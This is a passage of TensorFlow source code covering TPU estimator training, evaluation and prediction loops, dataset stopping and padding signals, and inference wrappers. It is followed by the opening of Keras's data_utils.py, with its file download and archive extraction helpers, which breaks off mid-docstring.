# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append([tf.constant(i) for i in range(ctx.num_replicas)])
(
compile_op,
loss,
) = tpu.split_compile_and_shard(
multi_tpu_eval_steps_on_single_shard,
inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_calls, captured_scaffold_fn,
captured_eval_hooks.get())
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_train_step, host_call, captured_scaffold_fn,
captured_training_hooks) = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
@tpu_function.on_device_training_loop
def multi_tpu_train_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
# replica as an array. As so, correctly reshape the input to be a
# scalar.
replica_id = tf.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
outputs = training_loop.while_loop(
lambda i, loss: i < iterations_per_loop_var,
lambda i, loss: [i + 1, single_tpu_train_step(i)],
inputs=[0, _INITIAL_LOSS])
return outputs[1:]
# Add input that represents id for each replica in sync so that
# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append([tf.constant(i) for i in range(ctx.num_replicas)])
(compile_op, loss) = tpu.split_compile_and_shard(
multi_tpu_train_steps_on_single_shard,
inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_call, captured_scaffold_fn,
captured_training_hooks.get())
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
(single_tpu_predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks
) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_predict_steps_on_single_shard(replica_id):
# `tpu.split_compile_and_shard()` splits and passes input for each
# replica as an array. As so, correctly reshape the input to be a
# scalar.
replica_id = tf.reshape(replica_id, [])
with tpu_context._TPUEstimatorReplicaContext(replica_id): # pylint: disable=protected-access
def cond(scalar_stopping_signal):
return tf.math.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
# Add input that represents id for each replica in sync so that
# _TPUEstimatorReplicaContext can be correctly entered during
# replicated computation.
replica_id_inputs = []
replica_id_inputs.append([tf.constant(i) for i in range(ctx.num_replicas)])
(
compile_op,
dummy_predict_op,
) = tpu.split_compile_and_shard(
multi_tpu_predict_steps_on_single_shard,
inputs=replica_id_inputs,
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
dummy_predict_op = dummy_predict_op[0]
return (compile_op, dummy_predict_op, host_calls, captured_scaffold_fn,
captured_predict_hooks.get())
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with tf.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with tf.compat.v1.device(device):
iterations = tf.identity(iterations_per_loop_var)
return tf.compat.v1.while_loop(
lambda i: i < iterations,
computation, [tf.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return tf.math.logical_not(_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with tf.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with tf.compat.v1.device(device):
return tf.compat.v1.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph(ctx):
"""Validate graph before running distributed training.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If the graph seems invalid for running on device
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return # b/124241278
operations = tf.compat.v1.get_default_graph().get_operations()
# Check if there is atleast one CrossReplicaSum operation in the graph
# This should be introduced by using the CrossShardOptimizer wrapper
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops and ctx.num_replicas > 1:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can capture only once. Please file bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file bug.')
return self._object
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def to_control_flow_context_def(self, context_def, export_scope=None):
# pylint: disable=useless-super-delegation
# NOTE(slebedev): the method is required by `ControlFlowContext`.
super(_CapturingContext,
self).to_control_flow_context_def(context_def, export_scope)
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def AddValue(self, value):
self.AddOp(value.op)
return value
def __enter__(self):
# pylint: disable=protected-access
self._g = tf.compat.v1.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, tf.compat.v2.data.Dataset):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer(self):
"""Returns the dataset's initializer.
The initializer must be run before calling `features_and_labels`.
"""
self._iterator = tf.compat.v1.data.make_initializable_iterator(
self._dataset)
return self._iterator.initializer
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must run dataset_initializer '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self,
dataset,
batch_size,
add_padding=False,
num_invocations_per_step=1):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
if num_invocations_per_step == 1:
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
else:
# We append (2 * num_invocations_per_step - 1) batches for exhausting the
# user_provided_dataset and stop properly.
# For example, if num_invocations_per_step is 2, we append 3 additional
# padding batches: b1, b2, b3.
# If user_provided_dataset contains two batches: a1, a2
# Step 1: [a1, a2]
# Step 2: [b1, b2] -> STOP
# If user_provided_dataset contains three batches: a1, a2, a3.
# The training loops:
# Step 1: [a1, a2]
# Step 2: [a3, b1]
# Step 3: [b2, b3] -> STOP.
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = final_batch_dataset.repeat(
2 * num_invocations_per_step - 1)
def _set_mask(data_dict):
signals = data_dict['signals']
signals['padding_mask'] = tf.compat.v1.ones_like(
signals['padding_mask'])
data_dict['signals'] = signals
return data_dict
# Mask out the extra batch.
final_batch_dataset = final_batch_dataset.map(_set_mask)
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary now and `features`, `labels`, and `signals` are three
distinguished keys in that dict. This provides a better structure, which
eases the process to decompose the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# for the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(features, labels,
batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size,
padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = tf.dtypes.bool
if self._stop:
stopping = tf.ones(shape=shape, dtype=dtype)
else:
stopping = tf.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return tf.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
"""Detects whether scalar_stopping_signal indicates stopping."""
if isinstance(scalar_stopping_signal, tf.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return tf.math.logical_and(scalar_stopping_signal,
_StopSignals.STOPPING_SIGNAL)
else:
# For non Tensor case, it is used in SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = tf.compat.v1.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = tf.constant(batch_size, tf.dtypes.int32)
check_greater = tf.compat.v1.debugging.assert_greater_equal(
batch_size_tensor,
real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with tf.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = tf.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = tf.compat.v1.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return tf.nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(real_batch_size, missing_count,
batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = tf.compat.v1.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = tf.math.equal(batch_size, tensor.shape[0])
with tf.control_dependencies([check_batch_size]):
return tf.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - tf.math.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
# order is preserved. By that, the sliced padding mask should have all 0's.
# If this assertion failed, # the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = tf.math.equal(
tf.math.reduce_sum(sliced_padding_mask), 0)
with tf.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = tf.math.equal(tf.math.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return tf.compat.v1.cond(
tf.math.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return tf.nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [
x for x in tf.nest.flatten(batch_features) if isinstance(x, tf.Tensor)
]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = tf.concat([
tf.zeros((real_batch_size,), dtype=tf.dtypes.int32),
tf.ones((missing_count,), dtype=tf.dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider to use Tensors with smaller shapes or reduce batch '
'size. Given:\n'
'{}'.format(
message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()
])))
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if hasattr(params, 'set_hparam'):
# For HParams, we need to use special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
def export_estimator_savedmodel(estimator,
export_dir_base,
serving_input_receiver_fn,
assets_extra=None,
as_text=False,
checkpoint_path=None):
"""Export `Estimator` trained model for TPU inference.
Args:
estimator: `Estimator` with which model has been trained.
export_dir_base: A string containing a directory in which to create
timestamped subdirectories containing exported SavedModels.
serving_input_receiver_fn: A function that takes no argument and returns a
`ServingInputReceiver` or `TensorServingInputReceiver`.
assets_extra: A dict specifying how to populate the assets.extra directory
within the exported SavedModel, or `None` if no extra assets are needed.
as_text: whether to write the SavedModel proto in text format.
checkpoint_path: The checkpoint path to export. If `None` (the default),
the most recent checkpoint found within the model directory is chosen.
Returns:
The string path to the exported directory.
"""
# `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
# `estimator.config`.
config = tpu_config.RunConfig(model_dir=estimator.model_dir)
est = TPUEstimator(
estimator._model_fn, # pylint: disable=protected-access
config=config,
params=estimator.params,
use_tpu=True,
train_batch_size=2048, # Does not matter.
eval_batch_size=2048, # Does not matter.
)
return est.export_saved_model(export_dir_base, serving_input_receiver_fn,
assets_extra, as_text, checkpoint_path)
def model_fn_inference_on_tpu(model_fn,
features,
labels=None,
config=None,
params=None,
batch_config=None):
"""Convenience wrapper for export_saved_model API v2 for a model_fn.
WARNING:THIS METHOD IS DEPRECATED AND NOT PART OF THE APIS.
Make sure to set
`export_saved_model_api_version=tpu_estimator.ExportSavedModelApiVersion.V2`
when initializing TPUEstimator (default API version is V1). This is because
1) `tpu.rewrite` (or `tpu.compile`) shouldn't be called in a nested way
(otherwise validation will throw error like
"NotImplementedError: tpu_shard_context cannot be nested.")
2) When using V1 API, Estimator calls `tpu.rewrite` so
using `model_fn_inference_on_tpu` will trigger a nested call.
When using V2 API, users of Estimator needs to call `tpu.rewrite` (which
the wrapper does).
It attempts to execute the entire model function on the TPU for prediction.
Note that this does not support features which are SparseTensors. If you have
SparseTensor features, consider partitioning your model function further and
use inference_on_tpu.
Args:
model_fn: the model_fn for which we want to inference on TPU.
features: a tensor or dict of tensors, serves as the feature inputs to the
model.
labels: a tensor or dict of tensors, serves as the labels inputs to the
model.
config: auxiliary config to the Estimator.
params: hparams that we want to pass to the model_fn.
batch_config: a named tuple to wrap the inference batching configuration
inputs.
Returns:
An EstimatorSpec containing the outputs in export_outputs and predictions.
"""
computation, capture = _build_computation_for_inference(
model_fn, labels, config, params)
tensors = call_computation(features, computation, batch_config=batch_config)
estimator_spec, export_outputs_dict, predictions_dict, none_indices = (
capture.get())
predictions_list = tensors[:len(predictions_dict)]
export_outputs_list_without_none = tensors[len(predictions_dict):]
# Reinsert `None`s which we've taken out in
# `_build_computation_for_inference()`.
export_outputs_list = []
while none_indices or export_outputs_list_without_none:
if none_indices and none_indices[0] == len(export_outputs_list):
export_outputs_list.append(None)
none_indices.pop(0)
else:
export_outputs_list.append(export_outputs_list_without_none.pop(0))
# Reconstruct `export_outputs` with updated tensors.
new_export_outputs_dict = tf.nest.pack_sequence_as(export_outputs_dict,
export_outputs_list)
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_export_outputs_dict))
# Reconstruct `predictions` with updated tensors.
new_predictions = tf.nest.pack_sequence_as(predictions_dict, predictions_list)
if (len(new_predictions) == 1 and
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR in new_predictions):
new_predictions = new_predictions[_KEY_WHEN_PREDICTIONS_IS_A_TENSOR]
return estimator_spec._replace(
export_outputs=new_export_outputs, predictions=new_predictions)
def _build_computation_for_inference(model_fn, labels, config, params):
"""Builds the computation with calls the model_fn for inference."""
capture = _CapturedObject()
def computation(computation_input):
"""Computation to be passed to `TPUPartitionedCall()`."""
tpu_computation, tpu_capture = _build_tpu_computation_for_inference(
model_fn, computation_input, labels, config, params)
tensors_on_cpu = tf.compat.v1.tpu.rewrite(tpu_computation)
tpu.prune_unconnected_ops_from_xla(tf.compat.v1.get_default_graph())
(estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict) = (
tpu_capture.get())
predictions_list = tensors_on_cpu[:len(predictions_dict)]
export_outputs_tpu_on_cpu_list = tensors_on_cpu[len(predictions_dict):]
# Reconstruct tensors used in export_outputs, with TPU tensors replaced
# with their CPU counterpart returned from `rewrite_for_inference()`.
# `function.Defun()` does not like `None`s in return values, so we leave
# `None`s out but record their positions for later reconstruction.
export_outputs_list_without_none = []
none_indices = []
for i, t in enumerate(export_outputs_list):
if t is None:
none_indices.append(i)
else:
export_outputs_list_without_none.append(
export_outputs_tpu_on_cpu_list.pop(0))
capture.capture(
(estimator_spec, export_outputs_dict, predictions_dict, none_indices))
return predictions_list + export_outputs_list_without_none
return computation, capture
def _build_tpu_computation_for_inference(model_fn, features, labels, config,
params):
"""Builds the TPU computation for inference on TPU."""
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
model_fn_args = function_utils.fn_args(model_fn)
kwargs = {}
# Makes deep copy with `config` and params` in case user mutates them.
if 'labels' in model_fn_args:
kwargs['labels'] = labels
if 'mode' in model_fn_args:
kwargs['mode'] = model_fn_lib.ModeKeys.PREDICT
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
estimator_spec = model_fn(features, **kwargs)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
export_outputs_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs))
export_outputs_list = tf.nest.flatten(export_outputs_dict)
export_outputs_tpu_list = [t for t in export_outputs_list if t is not None]
if isinstance(estimator_spec.predictions, dict):
predictions_dict = collections.OrderedDict(
(k, v) for k, v in six.iteritems(estimator_spec.predictions))
else:
predictions_dict = {
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR: estimator_spec.predictions
}
predictions_list = tf.nest.flatten(predictions_dict)
# We cannot return everything we want through the return values, so
# capture the rest here for later use.
capture.capture((estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict))
return predictions_list + export_outputs_tpu_list
return computation, capture
def inference_on_tpu(computation,
inputs_to_tpu,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes=None,
max_enqueued_batches=100):
"""Convenient wrapper for export_saved_model API v2 to wrap TPU computation.
WARNING: THIS METHOD IS DEPRECATED AND NOT PART OF THE APIS.
Make sure to set
`export_saved_model_api_version=tpu_estimator.ExportSavedModelApiVersion.V2`
when initializing TPUEstimator (default API version is V1). This is because
1) `tpu.rewrite` (or `tpu.compile`) shouldn't be called in a nested way
(otherwise validation will throw error like
"NotImplementedError: tpu_shard_context cannot be nested.")
2) When using V1 API, Estimator calls `tpu.rewrite` so
using `model_fn_inference_on_tpu` will trigger a nested call.
When using V2 API, users of Estimator needs to call `tpu.rewrite` (which
the wrapper does).
It puts computation on TPU, add batching around it and round robin computation
between TPU cores.
See tpu_estimator_test.py for an example.
Args:
computation: computation to be put on TPU, which takes inputs_to_tpu as
arguments.
inputs_to_tpu: a list of tensors as input to computation.
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this. If None or 0,
no batching will done.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op to
pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to 100.
Returns:
The unbatched computation output Tensors.
"""
def _tpu_call(args):
"""Function to either call or feed into BatchFunction."""
@function.Defun(capture_resource_var_by_value=False)
def tpu_computation():
"""Function to feed into the TPUPartitionedCallOp."""
tensors_on_cpu = tf.compat.v1.tpu.rewrite(computation, args)
tpu.prune_unconnected_ops_from_xla(tf.compat.v1.get_default_graph())
return tensors_on_cpu
return tpu_functional.TPUPartitionedCall(
args=tpu_computation.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_computation.definition.signature.output_arg],
f=tpu_computation)
if not max_batch_size:
return _tpu_call(inputs_to_tpu)
@tf.nondifferentiable_batch_function(num_batch_threads, max_batch_size,
batch_timeout_micros,
allowed_batch_sizes,
max_enqueued_batches)
def batched_tpu_computation(*args):
"""Function to feed into the BatchOp."""
return _tpu_call(args)
return batched_tpu_computation(*inputs_to_tpu)
|
data_utils.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-import-not-at-top
"""Utilities for file download and caching."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from abc import abstractmethod
from contextlib import closing
import hashlib
import multiprocessing
from multiprocessing.pool import ThreadPool
import os
import random
import shutil
import sys
import tarfile
import threading
import time
import zipfile
import numpy as np
import six
from six.moves.urllib.error import HTTPError
from six.moves.urllib.error import URLError
from six.moves.urllib.request import urlopen
from tensorflow.python.keras.utils.generic_utils import Progbar
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
try:
import queue
except ImportError:
import Queue as queue
if sys.version_info[0] == 2:
def urlretrieve(url, filename, reporthook=None, data=None):
"""Replacement for `urlretrive` for Python 2.
Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy
`urllib` module, known to have issues with proxy management.
Arguments:
url: url to retrieve.
filename: where to store the retrieved data locally.
reporthook: a hook function that will be called once
on establishment of the network connection and once
after each block read thereafter.
The hook will be passed three arguments;
a count of blocks transferred so far,
a block size in bytes, and the total size of the file.
data: `data` argument passed to `urlopen`.
"""
def chunk_read(response, chunk_size=8192, reporthook=None):
content_type = response.info().get('Content-Length')
total_size = -1
if content_type is not None:
total_size = int(content_type.strip())
count = 0
while True:
chunk = response.read(chunk_size)
count += 1
if reporthook is not None:
reporthook(count, chunk_size, total_size)
if chunk:
yield chunk
else:
break
response = urlopen(url, data)
with open(filename, 'wb') as fd:
for chunk in chunk_read(response, reporthook=reporthook):
fd.write(chunk)
else:
from six.moves.urllib.request import urlretrieve
def is_generator_or_sequence(x):
"""Check if `x` is a Keras generator type."""
return tf_inspect.isgenerator(x) or isinstance(x, Sequence)
def _extract_archive(file_path, path='.', archive_format='auto'):
"""Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats.
Arguments:
file_path: path to the archive file
path: path to extract the archive file
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
Returns:
True if a match was found and an archive extraction was completed,
False otherwise.
"""
if archive_format is None:
return False
if archive_format == 'auto':
archive_format = ['tar', 'zip']
if isinstance(archive_format, six.string_types):
archive_format = [archive_format]
for archive_type in archive_format:
if archive_type == 'tar':
open_fn = tarfile.open
is_match_fn = tarfile.is_tarfile
if archive_type == 'zip':
open_fn = zipfile.ZipFile
is_match_fn = zipfile.is_zipfile
if is_match_fn(file_path):
with open_fn(file_path) as archive:
try:
archive.extractall(path)
except (tarfile.TarError, RuntimeError, KeyboardInterrupt):
if os.path.exists(path):
if os.path.isfile(path):
os.remove(path)
else:
shutil.rmtree(path)
raise
return True
return False
@tf_export('keras.utils.get_file')
def get_file(fname,
origin,
untar=False,
md5_hash=None,
file_hash=None,
cache_subdir='datasets',
hash_algorithm='auto',
extract=False,
archive_format='auto',
cache_dir=None):
"""Downloads a file from a URL if it not already in the cache.
By default the file at the url `origin` is downloaded to the
cache_dir `~/.keras`, placed in the cache_subdir `datasets`,
and given the filename `fname`. The final location of a file
`example.txt` would therefore be `~/.keras/datasets/example.txt`.
Files in tar, tar.gz, tar.bz, and zip formats can also be extracted.
Passing a hash will verify the file after download. The command line
programs `shasum` and `sha256sum` can compute the hash.
Arguments:
fname: Name of the file. If an absolute path `/path/to/file.txt` is
specified the file will be saved at that location.
origin: Original URL of the file.
untar: Deprecated in favor of 'extract'.
boolean, whether the file should be decompressed
md5_hash: Deprecated in favor of 'file_hash'.
md5 hash of the file for verification
file_hash: The expected hash string of the file after download.
The sha256 and md5 hash algorithms are both supported.
cache_subdir: Subdirectory under the Keras cache dir where the file is
saved. If an absolute path `/path/to/folder` is
specified the file will be saved at that location.
hash_algorithm: Select the hash algorithm to verify the file.
options are 'md5', 'sha256', and 'auto'.
The default 'auto' detects the hash algorithm in use.
extract: True tries extracting the file as an Archive, like tar or zip.
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
cache_dir: Location to store cached files, when None it
defaults to the [Keras
